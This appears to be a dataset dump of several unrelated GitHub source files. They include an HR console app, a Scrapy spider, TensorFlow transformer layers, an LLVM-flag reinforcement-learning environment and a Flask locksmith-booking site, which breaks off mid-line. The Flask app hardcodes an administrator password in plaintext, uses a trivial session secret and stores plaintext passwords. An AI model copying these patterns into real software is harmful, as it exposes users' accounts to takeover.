:- \")\r\n if ch == 'n' or ch == 'N':\r\n break\r\n\r\n file.close()\r\n input(\"!!!!PRESS ENTER TO MAIN MENU!!!!\")\r\n os.system('cls')\r\n main()\r\n\r\n def fetch_data(self):\r\n\r\n l1 = []\r\n d1 = int(input(\r\n \"SELECT ANY ONE:-\\n1> See all records\\n2> See specific record\\n\"))\r\n\r\n with open('registration.csv', 'r') as f:\r\n record = csv.reader(f, delimiter=',', dialect='excel')\r\n\r\n if d1 == 1:\r\n for dta in record:\r\n l1.append(dta)\r\n\r\n print(Fore.BLUE)\r\n newTable = PrettyTable(\r\n ['e_name', 'age', 'date_of_birth', 'e_id', 'e_id_number', 'address', 'contact', 'email'])\r\n newTable.add_rows(l1)\r\n print(newTable)\r\n print(Style.RESET_ALL)\r\n else:\r\n data1 = input(\"enter the employee id to see the record: \")\r\n for dta in record:\r\n if data1 in dta:\r\n l1 = dta\r\n print(l1)\r\n print(Fore.LIGHTBLUE_EX+'employee_name: |', l1[0])\r\n print('age: |', l1[1])\r\n print('date of birth: |', l1[2])\r\n print('employee id: |', l1[3])\r\n print('employee id number: |', l1[4])\r\n print('address: |', l1[5])\r\n print('contact: |', l1[6])\r\n print('email: |', l1[7])\r\n print(Style.RESET_ALL)\r\n\r\n if data1 not in l1:\r\n print(\"record not found!!!!!\")\r\n\r\n f.close()\r\n input(\"!!!!PRESS ENTER TO MAIN MENU!!!!\")\r\n os.system('cls')\r\n main()\r\n\r\n def update_data(self):\r\n\r\n newrecord = []\r\n l1 = []\r\n\r\n with open('registration.csv', 'r+', newline='') as f:\r\n\r\n data = csv.reader(f, delimiter=',', dialect='excel')\r\n\r\n fields = ['e_name', 'age', 'date_of_birth', 'e_id',\r\n 'e_id_number', 'address', 'contact', 'email']\r\n\r\n search_name = input(\r\n \"enter the name of the employee whose record to be updated: \")\r\n\r\n print(\"1- name\\n2- age\\n3- date of birth\\n4- employee id\\n5- employee id number\\n6- address\\n7- contact\\n8- email\\n\")\r\n\r\n selectfield = int(\r\n input(\"enter the number of field that u want to update: \"))\r\n\r\n for dta in data:\r\n l1.append(dta)\r\n p = len(l1)\r\n\r\n for i in range(p-1):\r\n if l1[i][0] == search_name:\r\n\r\n if selectfield == 1:\r\n l1[i][0] = input(\"enter the new data: \")\r\n\r\n if selectfield == 2:\r\n l1[i][1] = input(\"enter the new data: \")\r\n\r\n if selectfield == 3:\r\n l1[i][2] = input(\"enter the new data: \")\r\n\r\n if selectfield == 4:\r\n l1[i][3] = input(\"enter the new data: \")\r\n\r\n if selectfield == 5:\r\n l1[i][4] = input(\"enter the new data: \")\r\n\r\n if selectfield == 6:\r\n l1[i][5] = input(\"enter the new data: \")\r\n\r\n if selectfield == 7:\r\n l1[i][6] = input(\"enter the new data: \")\r\n\r\n if selectfield == 8:\r\n l1[i][7] = input(\"enter the new data: \")\r\n\r\n f.seek(0, 0)\r\n dta1 = csv.writer(f, delimiter=',', dialect='excel')\r\n dta1.writerows(newrecord)\r\n f.close()\r\n input(\"!!!!PRESS ENTER TO MAIN MENU!!!!\")\r\n os.system('cls')\r\n main()\r\n\r\n\r\ndef main():\r\n \r\n\r\n print(Fore.LIGHTGREEN_EX +\r\n (pyfiglet.figlet_format(text=\"HR MANAGEMENT SYSTEM\", font=\"digital\")))\r\n print(Fore.YELLOW+\"1> NEW REGISTRATION OF EMPLOYEE\\n2> SEE DETAIL OF EMPLOYEE\\n3> UPDATE THE PRE-EXISTING EMPLOYEE RECORD\\n4> EXIT\")\r\n print(Style.RESET_ALL)\r\n c = int(input(\"Enter ur choice: \"))\r\n\r\n if c == 1:\r\n r1.register_data()\r\n elif c == 2:\r\n r1.fetch_data()\r\n elif c == 3:\r\n r1.update_data()\r\n elif c == 4:\r\n print(\"thank u 😊😊\")\r\n exit()\r\n\r\nr1 = registration()\r\nmain()\r\n","repo_name":"anubhav009-pandey/HR-MANAGEMENT-PROJECT","sub_path":"HR PROJECT.PY","file_name":"HR 
PROJECT.PY","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10403226542","text":"from setuptools import setup\nfrom os import path\n\n\nPACKAGE_NAME = 'nameko_worker_logger'\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name=PACKAGE_NAME,\n version='1.0.0',\n description='A package with logger for nameko worker',\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/emlid/Nameko-logging-ELK',\n author='Emlid ltd.',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n packages=[PACKAGE_NAME],\n install_requires=[\n 'nameko==2.11.0'\n ],\n)\n","repo_name":"emlid/nameko-ctx-logger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"8391093011","text":"import re\n\nimport scrapy\n\nfrom scrapy.loader import ItemLoader\nfrom ..items import CqbItem\nfrom itemloaders.processors import TakeFirst\npattern = r'(\\xa0)?'\n\nclass CqbSpider(scrapy.Spider):\n\tname = 'cqb'\n\tstart_urls = ['https://www.ccbank.bg/bg/za-ckb/novini?page=1']\n\n\tdef parse(self, response):\n\t\tpost_links = response.xpath('//li[@class=\"news-list__item\"]/a/@href').getall()\n\t\tyield from response.follow_all(post_links, self.parse_post)\n\n\t\tnext_page = response.xpath('//a[@class=\"paginator__btn paginator__btn--next\"]/@href').get()\n\t\tif next_page:\n\t\t\tyield response.follow(next_page, self.parse)\n\n\n\tdef parse_post(self, response):\n\n\t\tdate = response.xpath('//time/@datetime').get()\n\t\tdate = re.findall(r'\\d+\\-\\d+\\-\\d+',date)\n\t\ttitle = response.xpath('//h1/text()').get().strip()\n\t\tcontent = response.xpath('//article[@class=\"text\"]//text()[not (ancestor::time) and not (ancestor::h1)]').getall()\n\t\tcontent = [p.strip() for p in content if p.strip()]\n\t\tcontent = re.sub(pattern, \"\",' '.join(content))\n\n\n\t\titem = ItemLoader(item=CqbItem(), response=response)\n\t\titem.default_output_processor = TakeFirst()\n\n\t\titem.add_value('title', title)\n\t\titem.add_value('link', response.url)\n\t\titem.add_value('content', content)\n\t\titem.add_value('date', date)\n\n\t\treturn item.load_item()\n","repo_name":"SimeonYS/cqb","sub_path":"cqb/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35321016505","text":"import tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras.layers import Conv1D, LayerNormalization\n\n# This code is taken from the TF tutorial on transformers\n# https://www.tensorflow.org/tutorials/text/transformer\ndef scaled_dot_product_attention(q, k, v, mask=None):\n \"\"\" Calculate the attention weights.\n q, k, v must have matching leading dimensions.\n k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.\n The mask has different shapes depending on its type(padding or look ahead)\n but it must be broadcastable for addition.\n\n Args:\n q: query shape == (..., seq_len_q, depth)\n k: key shape == (..., seq_len_k, depth)\n v: value shape == (..., seq_len_v, depth_v)\n 
mask: Float tensor with shape broadcastable\n to (..., seq_len_q, seq_len_k). Defaults to None.\n\n Returns:\n output, attention_weights\n \"\"\"\n\n matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)\n\n # scale matmul_qk\n dk = tf.cast(tf.shape(k)[-1], tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n\n # add the mask to the scaled tensor.\n if mask is not None:\n scaled_attention_logits += (mask * -1e9)\n\n # softmax is normalized on the last axis (seq_len_k) so that the scores\n # add up to 1.\n attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k)\n\n output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)\n\n return output, attention_weights\n\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads):\n super(MultiHeadAttention, self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n\n assert d_model % self.num_heads == 0\n\n self.depth = d_model // self.num_heads\n\n self.wq = tf.keras.layers.Dense(d_model)\n self.wk = tf.keras.layers.Dense(d_model)\n self.wv = tf.keras.layers.Dense(d_model)\n\n self.dense = tf.keras.layers.Dense(d_model)\n\n def split_heads(self, x, batch_size):\n \"\"\"Split the last dimension into (num_heads, depth).\n Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)\n \"\"\"\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def call(self, v, k, q, mask=None):\n batch_size = tf.shape(q)[0]\n\n q = self.wq(q) # (batch_size, seq_len, d_model)\n k = self.wk(k) # (batch_size, seq_len, d_model)\n v = self.wv(v) # (batch_size, seq_len, d_model)\n\n q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)\n k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)\n v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)\n\n # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)\n # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)\n scaled_attention, attention_weights = scaled_dot_product_attention(q, k, v, mask)\n\n # (batch_size, seq_len_q, num_heads, depth)\n scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3])\n\n # (batch_size, seq_len_q, d_model)\n concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model))\n\n # (batch_size, seq_len_q, d_model)\n output = self.dense(concat_attention)\n\n return output, attention_weights\n\n\ndef point_wise_feed_forward_network(d_model, dff):\n return tf.keras.Sequential([\n tf.keras.layers.Dense(dff, activation='relu'), # (batch_size, seq_len, dff)\n tf.keras.layers.Dense(d_model) # (batch_size, seq_len, d_model)\n ])\n\n\ndef positional_encoding(positions, d_model, T=10000):\n\n if isinstance(positions, int):\n positions = np.arange(positions)\n else:\n positions = np.array(positions)\n\n def _get_angles(pos, i, d_model):\n angle_rates = 1 / np.power(T, (2 * (i//2)) / np.float32(d_model))\n return pos * angle_rates\n\n depths = np.arange(d_model)\n\n angle_rads = _get_angles(positions[:, np.newaxis],\n depths[np.newaxis, :],\n d_model)\n\n # apply sin to even indices in the array; 2i\n angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])\n\n # apply cos to odd indices in the array; 2i+1\n angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])\n\n pos_encoding = angle_rads[np.newaxis, ...]\n\n return tf.cast(pos_encoding, 
dtype=tf.float32)\n\n\nclass EncoderLayer(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(EncoderLayer, self).__init__()\n\n self.mha = MultiHeadAttention(d_model, num_heads)\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n\n def call(self, x, training=None, mask=None):\n attn_output, _ = self.mha(x, x, x, mask) # (batch_size, input_seq_len, d_model)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(x + attn_output) # (batch_size, input_seq_len, d_model)\n\n ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)\n ffn_output = self.dropout2(ffn_output, training=training)\n out2 = self.layernorm2(out1 + ffn_output) # (batch_size, input_seq_len, d_model)\n\n return out2\n\n\nclass Encoder(tf.keras.layers.Layer):\n def __init__(self, num_layers, d_model, num_heads, dff, maximum_position_encoding, rate=0.1, layer_norm=False, T=10000):\n super(Encoder, self).__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.lnorm_in = tf.keras.layers.LayerNormalization() if layer_norm else None\n self.lnorm_conv = tf.keras.layers.LayerNormalization() if layer_norm else None\n\n # replace embedding with 1d convolution\n self.conv_in = Conv1D(d_model, 1)\n # self.embedding = tf.keras.layers.Embedding(input_vocab_size, d_model)\n self.pos_encoding = positional_encoding(maximum_position_encoding, self.d_model, T=T)\n\n encoder_layers = [EncoderLayer(d_model, num_heads, dff, rate)\n for _ in range(num_layers)]\n self.encoder = tf.keras.Sequential(encoder_layers)\n\n self.dropout = tf.keras.layers.Dropout(rate)\n\n\n def call(self, x, training=None, mask=None):\n seq_len = tf.shape(x)[1]\n\n if self.lnorm_in:\n x = self.lnorm_in(x)\n\n # adding embedding and position encoding.\n x = self.conv_in(x, training=training) # (batch_size, input_seq_len, d_model)\n if self.lnorm_conv:\n x = self.lnorm_conv(x)\n\n x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n x += self.pos_encoding[:, :seq_len, :]\n\n x = self.dropout(x, training=training)\n\n x = self.encoder(x, training=training, mask=mask)\n\n return x # (batch_size, input_seq_len, d_model)\n","repo_name":"sentinel-hub/eo-flow","sub_path":"eoflow/models/transformer_encoder_layers.py","file_name":"transformer_encoder_layers.py","file_ext":"py","file_size_in_byte":7250,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"48"} +{"seq_id":"1693851203","text":"from pickle import FALSE\nimport gym\nimport subprocess\nimport numpy as np\nimport random\nimport os\nfrom numpy import dtype\nimport datetime\n\nDEBUG = False\n\nclass Memory_v0 (gym.Env):\n # Actions\n # Flags that are verified with ../Preprocess/Flag_Seive.sh\n # Use FLAG_NUM flags\n # Flag lists are stored in ../Preprocess/Valid_Flags.txt\n #\n # States\n # States are feature obtained from PCA in ../Preprocess/Faeture_PCA.py\n # States info are stored in ../Preprocess/Feature_PCA_Result.txt\n #\n\n NEG_INF = -1e8\n\n def print_action(self, action):\n print(\"Current action: \", end=\"\")\n for flag_idx in action:\n print(self.FLAG_LIST[flag_idx], end=\" | \")\n print(\"\")\n\n\n def print_feature(self):\n print(\"Current feature: \", end=\"\")\n for pca_idx in range(len(self.feature)):\n 
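# each entry of self.feature is one PCA component, shown to 3 decimal places\n            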
print(str(round(self.feature[pca_idx], 3)), end=\" \")\n        print(\"\")\n\n\n    def get_preprocess_values(self):\n        with open(\"../Preprocess/Valid_Flags.txt\", \"r\") as f:\n            self.TOTAL_FLAG_NUM = int(f.readline().strip())\n            self.FLAG_LIST = list()\n            for _ in range(self.TOTAL_FLAG_NUM):\n                s = f.readline().strip()\n                self.FLAG_LIST.append(s)\n\n        if DEBUG:\n            print(\"# Valid Flags: \", self.TOTAL_FLAG_NUM)\n            print(\"Flag lists: \", self.FLAG_LIST)\n        with open(\"../Preprocess/Feature_PCA_Result.txt\", \"r\") as f:\n            self.FEATURE_NUM = int(f.readline().strip())\n\n\n    def get_feature(self):\n        # Run LLVM Pass feature extraction\n        self.feature_raw_file = self.data_path + \"feature_\" + self.ir.split('.')[0] + \"_raw.in\"\n        self.feature_pca_file = self.data_path + \"feature_\" + self.ir.split('.')[0] + \"_pca.in\"\n        subprocess.run([\"bash\", \"feature_extract.sh\", self.tmp_ir, self.feature_raw_file])\n\n        # Apply PCA to obtained feature\n        subprocess.run([\"python3\", \"Feature_PCA.py\", self.feature_raw_file, self.feature_pca_file])\n        feature = list()\n        with open(self.feature_pca_file, \"r\") as f:\n            self.FEATURE_NUM = int(f.readline().strip())\n            for _ in range(self.FEATURE_NUM):\n                feat = float(f.readline().strip())\n                feature.append(feat)\n        subprocess.run([\"rm\", self.feature_raw_file])\n        subprocess.run([\"rm\", self.feature_pca_file])\n        return feature\n\n\n    def get_performance(self, ir, flags):\n        retry_num = 0\n        while True: # repeat until no error\n            process = subprocess.Popen([\"bash\", \"compile_and_profile.sh\", ir, flags], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n            # communicate() may only be called once per Popen, so cache its result\n            out, err = process.communicate()\n            if retry_num >= 2:\n                print((out, err))\n\n            if out == '': \n                retry_num += 1\n                print(\"Retrying get_performance: \", retry_num)\n                if retry_num > 10: return self.base_performance\n                continue\n            performance = int(out)\n            errmsg = str(err)\n            if errmsg != \"\":\n                print(\" ! 
(COMPILE_AND_PROFILE.SH ERR) ERRMSG: \", errmsg)\n break\n return performance\n\n\n def get_reward (self, action):\n process = subprocess.Popen([\"stat\", \"-c%s\", self.data_ir], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n if self.base_ir_size != int(process.communicate()[0]):\n print(\"Update base\")\n # self.base_performance = self.get_performance(self.data_ir, \"-no-flag\")\n self.base_performance = self.get_performance(self.data_ir, \"-o0\")\n\n flags = \"\"\n for flag_idx in action:\n flags += (self.FLAG_LIST[flag_idx] + \" \")\n performance = self.get_performance(self.tmp_ir, flags.strip())\n diff = performance - self.base_performance # low memory usage is good\n percent = (diff / self.base_performance)*100\n print(\"Memory Usage: \", round(percent, 3), \"% (neg is good)\")\n reward = - percent * 100\n return reward # performance improvement is good\n\n\n metadata = { \"render.modes\": [\"human\"] }\n\n def __init__ (self):\n\n # Currently using irfile move to workspace\n path_prefix = \"env_\" + str(random.randint(0, 1000000)) + \"/\" # File should be seperated for multi-core\n self.ir = \"target.bc\"\n self.tmp_path = \"./tmp/\" + path_prefix\n self.data_path = \"./data/\" + path_prefix\n subprocess.run([\"mkdir\", self.tmp_path])\n subprocess.run([\"mkdir\", self.data_path])\n self.tmp_ir = \"./tmp/\" + path_prefix + self.ir # IR used while training RL (kepp changing)\n self.data_ir = \"./data/\" + path_prefix + self.ir # Original IR (constant)\n subprocess.run([\"cp\", \"./data/target.bc\", self.data_ir])\n subprocess.run([\"cp\", \"./data/target.bc\", self.tmp_ir])\n # subprocess.run([\"rm\", \"./data/target.bc\"])\n\n # Initial values from preprocessing\n self.get_preprocess_values()\n self.used_flag_num = 12\n\n # Action space is flags\n # Value is the index of the FLAG_LIST\n self.action_space = gym.spaces.Box(\n low=0, \n high=(self.TOTAL_FLAG_NUM-1), \n shape=(self.used_flag_num, ), \n dtype=np.int32)\n\n # Observation space is number of features\n # Box is consists of 2 parts\n # 1. 0 ~ FLAG_NUM-1: histogram of used flags\n # 2. 
FLAG_NUM ~ FLAG_NUM+FEATURE_NUM-1: values for each features\n        self.observation_space = gym.spaces.Box(\n            low=-1.0,\n            high=1.0,\n            shape=(self.FEATURE_NUM, ),\n            dtype=np.float32)\n\n        self.reset()\n\n\n    def reset (self):\n        \"\"\"\n        Reset the state of the environment and returns an initial observation.\n\n        Returns\n        -------\n        observation (object): the initial observation of the space.\n        \"\"\"\n        self.feature = self.get_feature()\n\n        # State is history + feature\n        self.state = np.array(self.feature, \n                            dtype=np.float32)\n        self.reward = 0\n        self.done = False\n        self.info = {}\n\n        # Initialize working ir file\n        subprocess.run([\"cp\", \"./data/target.bc\", self.data_ir])\n        subprocess.run([\"cp\", \"./data/target.bc\", self.tmp_ir])\n\n        # Get baseline performance\n        self.base_performance = self.get_performance(self.data_ir, \"-no-flag\")\n        \n        # Episode index (used for when to initialize ir and base performance)\n        process = subprocess.Popen([\"stat\", \"-c%s\", self.data_ir], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n        self.base_ir_size = int(process.communicate()[0])\n\n        self.episode_idx = 0\n\n        return self.state\n    \n\n    def step (self, action):\n        \"\"\"\n        The agent takes a step in the environment.\n        \"\"\"\n\n        if DEBUG:\n            self.print_feature()\n            self.print_action(action)\n\n        if self.done:\n            # code should never reach this point\n            print(\"EPISODE DONE!!!\")\n\n        else:\n            assert self.action_space.contains(action)\n\n            self.state = np.array(self.feature, \n                            dtype=np.float32)\n            self.reward = self.get_reward(action)\n            self.done = True\n\n        \n        # Clear unused workspace\n        tmp_dir_lists = os.listdir(\"./tmp\")\n        for tmp_dir in tmp_dir_lists: # empty tmp folders belong to finished runs\n            path = \"./tmp/\" + tmp_dir + \"/\"\n            try:\n                file_modified = datetime.datetime.fromtimestamp(os.path.getmtime(path))\n            except OSError:\n                file_modified = datetime.datetime.now()\n            if datetime.datetime.now() - file_modified > datetime.timedelta(seconds=30):\n                print(\"Delete \", path)\n                try:\n                    os.rmdir(path)\n                except OSError:\n                    pass\n\n\n        # subprocess.run([\"rm\", \"-r\", self.data_path])\n        # subprocess.run([\"rm\", \"-r\", self.tmp_path])\n        \n\n        try:\n            assert self.observation_space.contains(self.state)\n        except AssertionError:\n            print(\"INVALID STATE\", self.state)\n\n        return [self.state, self.reward, self.done, self.info]\n\n\n    def render (self, mode=\"human\"):\n        \"\"\"Renders the environment.\n        \"\"\"\n        s = \"position: {} reward: {} info: {}\"\n        print(s.format(self.state, self.reward, self.info))\n\n\n    def close (self):\n        pass","repo_name":"jschang0215/RL-TransformPass-Optimization","sub_path":"RL/rl_env/envs/memory_env.py","file_name":"memory_env.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10322176841","text":"import ast\nfrom typing import Callable\n\n\ndef remap(plans, unitmaps, popmap=None) -> Callable:\n    \"\"\"\n    Re-maps assignments to the specified set of units.\n\n    Args:\n        plans (DataFrame): The Pandas DataFrame produced by ``tabularized()``.\n        unitmaps (dict): A dictionary whose keys are unit types appearing\n            in the `unitsType` column, and whose values are dictionaries\n            mapping unique identifiers of one set of geometries to unique\n            identifiers (or lists of unique identifiers) of another set of\n            geometries; these correspond to mappings generated by `unitmap()`\n            and the inverse mapping generated by `invert()`.\n        popmap (dict, optional): A mapping from unit unique identifiers to\n            population values. 
Only applies when we are mapping from smaller\n            units to larger ones.\n\n    Returns:\n        A function\n    \"\"\"\n\n    def _(row):\n        # Get the assignment for the row.\n        assignment = ast.literal_eval(row[\"plan\"])\n\n        # Attempt to get the type of units specified by the row; if we\n        # can't – i.e. the user didn't specify a unit mapping corresponding\n        # to that unit type in `unitmaps` – we leave the assignment alone and warn the user.\n        try:\n            unitsType = row[\"units\"]\n            unitmap = unitmaps[unitsType]\n        except BaseException:\n            print(f\"No unit mapping provided for {row['units']}; skipping.\")\n            return assignment\n\n        # What kind of mapping do we have? If `mapping` is from a single key\n        # to a single value, then we're mapping units one-to-one (e.g. block\n        # IDs to VTD IDs); otherwise, we're mapping units one-to-many (e.g.\n        # VTD IDs to blocks). If `mapping` is of the former type, then\n        # it's possible that some larger units may comprise smaller units\n        # in multiple districts. If this is the case, then we assign larger\n        # units to the district in which most of the larger unit's population\n        # resides; otherwise, we simply assign all smaller units to whichever\n        # district the larger unit's in.\n        firstvalue = next(iter(unitmap.values()))\n        unitmapdirection = \"down\"\n\n        # Mark which kind of mapping we have.\n        if isinstance(firstvalue, list):\n            unitmapdirection = \"down\"\n        else:\n            unitmapdirection = \"up\"\n\n        # Now, based on the mapping type, return the appropriate mapping.\n        if unitmapdirection == \"down\":\n            return _down(unitmap, assignment)\n        return _up(unitmap, assignment, popmap)\n\n    plans[\"plan\"] = plans.apply(_, axis=1)\n    return plans\n\n\ndef _down(unitmap, assignment) -> dict:\n    \"\"\"\n    Maps districting assignments from larger units to smaller\n    units (which nest in the larger units).\n\n    Args:\n        unitmap (dict): Dictionary which maps larger unit identifiers to\n            lists of smaller unit identifiers (e.g. 
VTD identifiers to\n block identifiers).\n assignment (dict): Maps larger unit identifiers to districts.\n\n Returns:\n Maps smaller unit identifiers to districts according to `assignment`.\n \"\"\"\n # Create an empty mapping.\n mapped = {}\n\n # For each of the keys in the provided assignment, get the units to which\n # the keys correspond, and assign them appropriately.\n for bigger, district in assignment.items():\n smallers = unitmap[bigger]\n mapped.update({smaller: district for smaller in smallers})\n\n return mapped\n\n\ndef _up(unitmap, assignment, popmap):\n return assignment\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/data/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"23352197759","text":"\r\nAPI_KEY = '' # ключи тут: https://yandex.ru/dev/translate/doc/dg/concepts/api-keys-docpage/\r\nURL = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\r\n\r\nfull_text = 'Привет'\r\n\r\nparams = {\r\n 'key': API_KEY,\r\n 'text': full_text,\r\n # 'lang': '{}-{}'.format(from_lang, to_lang)\r\n 'lang': 'ru-en'\r\n }\r\noutput_file = 'output_translate.txt'\r\n","repo_name":"KirillDaX/Task_ADPY4","sub_path":"task_tests2/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25792872567","text":"from flask import Flask, render_template, request, redirect, url_for, flash, g \nfrom handlers import error_pages\nfrom flask_mysqldb import MySQL\nfrom flask import session\nimport smtplib\n\napp = Flask(__name__)\n\napp.register_blueprint(error_pages)\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/registro')\ndef registro():\n return render_template('registro.html')\n\n@app.route('/login')\ndef login():\n return render_template('loging.html')\n\n@app.route('/homeusua')\ndef homeusua():\n if not g.user:\n return render_template('peligro.html')\n return render_template('homeusua.html')\n\n@app.route('/consulta')\ndef consulta():\n if not g.user:\n return render_template('peligro.html')\n return render_template('consulta.html')\n\n@app.route('/consulta-carro')\ndef conscar():\n if not g.user:\n return render_template('peligro.html')\n return render_template('consulta-carro.html')\n\n@app.route('/consulta-casa')\ndef conscasa():\n if not g.user:\n return render_template('peligro.html')\n return render_template('consulta-casa.html')\n\n@app.route('/reserva')\ndef reserva():\n if not g.user:\n return render_template('peligro.html')\n return render_template('reserva.html')\n\n@app.route('/reserva-carro')\ndef reservacar():\n if not g.user:\n return render_template('peligro.html')\n return render_template('reserva-carro.html')\n\n@app.route('/reserva-casa')\ndef reservacas():\n if not g.user:\n return render_template('peligro.html')\n return render_template('reserva-casa.html')\n\n@app.route('/homeadmin')\ndef homeadmin():\n if not g.user:\n return render_template('peligro.html')\n elif session['user'] == 'admin':\n return render_template('homeadmin.html')\n else:\n return render_template('peligro.html')\n\n@app.route('/adminres')\ndef adminres():\n if not g.user:\n return render_template('peligro.html')\n return render_template('adminres.html')\n\n@app.route('/admincar')\ndef admincar():\n if not g.user:\n return render_template('peligro.html')\n\n cur = mysql.connection.cursor()\n 
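# read-only listing for the admin table; queries that embed user input elsewhere in this app should use the parameterized form, e.g. cur.execute('SELECT * FROM usuario WHERE correo = %s', (correo,))\n    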
cur.execute('SELECT * FROM reservacarro')\n    data = cur.fetchall()\n    return render_template('adminres-car.html', contacts = data)\n    \n\n@app.route('/admincas')\ndef admincas():\n    if not g.user:\n        return render_template('peligro.html')\n\n    cur = mysql.connection.cursor()\n    cur.execute('SELECT * FROM reservacasa')\n    data = cur.fetchall()\n    return render_template('adminres-cas.html', contacts = data)\n\n@app.route('/admincon')\ndef admincon():\n    if not g.user:\n        return render_template('peligro.html')\n    return render_template('admincon.html')\n\n@app.route('/adminconscar')\ndef adminconscar():\n    if not g.user:\n        return render_template('peligro.html')\n\n    cur = mysql.connection.cursor()\n    cur.execute('SELECT * FROM consultacarro')\n    data = cur.fetchall()\n    return render_template('admincons-car.html', contacts = data)\n\n@app.route('/adminconscas')\ndef adminconscas():\n    if not g.user:\n        return render_template('peligro.html')\n\n    cur = mysql.connection.cursor()\n    cur.execute('SELECT * FROM consultacasa')\n    data = cur.fetchall()\n    return render_template('admincons-cas.html', contacts = data)\n\n@app.route('/usuarios')\ndef usuarios():\n    if not g.user:\n        return render_template('peligro.html')\n\n    cur = mysql.connection.cursor()\n    cur.execute('SELECT * FROM usuario')\n    data = cur.fetchall()\n    return render_template('usuarios.html', contacts = data)\n\n\n\n\n#--- ---- ------ ------ ------- ------- -------- --------- -------- -------- -------\n\n#conexion MySQL\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_DB'] = 'cerrajeria'\nmysql = MySQL(app)\n# ----------------- -------------------- ---------------------- ----------------------\n\n#inicio de secion\n\napp.secret_key ='mysecretkey'\n\n@app.route('/')\ndef Index():\n    return render_template('registro.html')\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n    #agregar datos\n\n@app.route('/add_contact', methods = ['POST'])\ndef add_contact():\n\n    if request.method == 'POST':\n\n        nombre = request.form['nombre']\n        apellido = request.form['apellido']\n        correo = request.form['correo']\n        passw = request.form['passw']\n        if (nombre == '' or apellido == '' or correo == '' or passw == ''):\n            flash('¡ Campos vacios !')\n            return render_template('registro.html')\n        cur = mysql.connection.cursor()\n        cur.execute('INSERT INTO usuario (nombre, apellido, correo, pass) VALUES (%s, %s, %s, %s)', (nombre, apellido, correo, passw))\n        mysql.connection.commit()\n        flash('Usuario registrado')\n        return render_template('loging.html')\n\n# ----------------- -------------------- ---------------------- ----------------------\n\n    # comparacion de datos\n\n@app.route('/loginz', methods = ['GET', 'POST'])\ndef loginz():\n    error = None\n    if request.method == 'POST':\n        session.pop('user', None)\n\n        session['user'] = request.form['correo']\n        passw = request.form['pass']\n        if (session['user'] == 'linacerrajeria@gmail.com' and passw == 'Asdf1234zxcv'):\n            session['user']='admin'\n            return redirect(url_for('protected'))\n        else:\n            if (session['user'] == 'linacerrajeria@gmail.com' and passw != 'Asdf1234zxcv' ):\n                flash('Hola Administrador, tu contraseña es incorrecta')\n                return redirect(url_for('login'))\n\n            cur = mysql.connection.cursor()\n            user = session['user'] \n            # parameterized query so user input cannot inject SQL\n            filas = cur.execute('SELECT * FROM usuario where correo = %s and pass = %s', 